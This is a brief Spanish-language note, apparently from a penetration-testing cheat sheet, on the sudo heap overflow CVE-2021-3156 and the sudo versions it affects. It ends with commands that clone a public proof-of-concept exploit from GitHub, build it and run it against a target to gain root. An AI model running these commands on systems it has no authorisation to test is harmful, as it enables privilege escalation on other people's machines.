$

CVE-2021-3156

#CVE-2021-3156#privileges-escalation

Una de las vulnerabilidades más recientes de sudo, CVE-2021-3156, se basa en un desbordamiento de búfer basado en el heap. Esto afectó a las siguientes versiones de sudo:

  • 1.8.31 - Ubuntu 20.04
  • 1.8.27 - Debian 10
  • 1.9.2 - Fedora 33
  • y otros

Existe una PoC pública que se puede utilizar para esto.

git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
make
cat /etc/lsb-release
./sudo-hax-me-a-sandwich <target>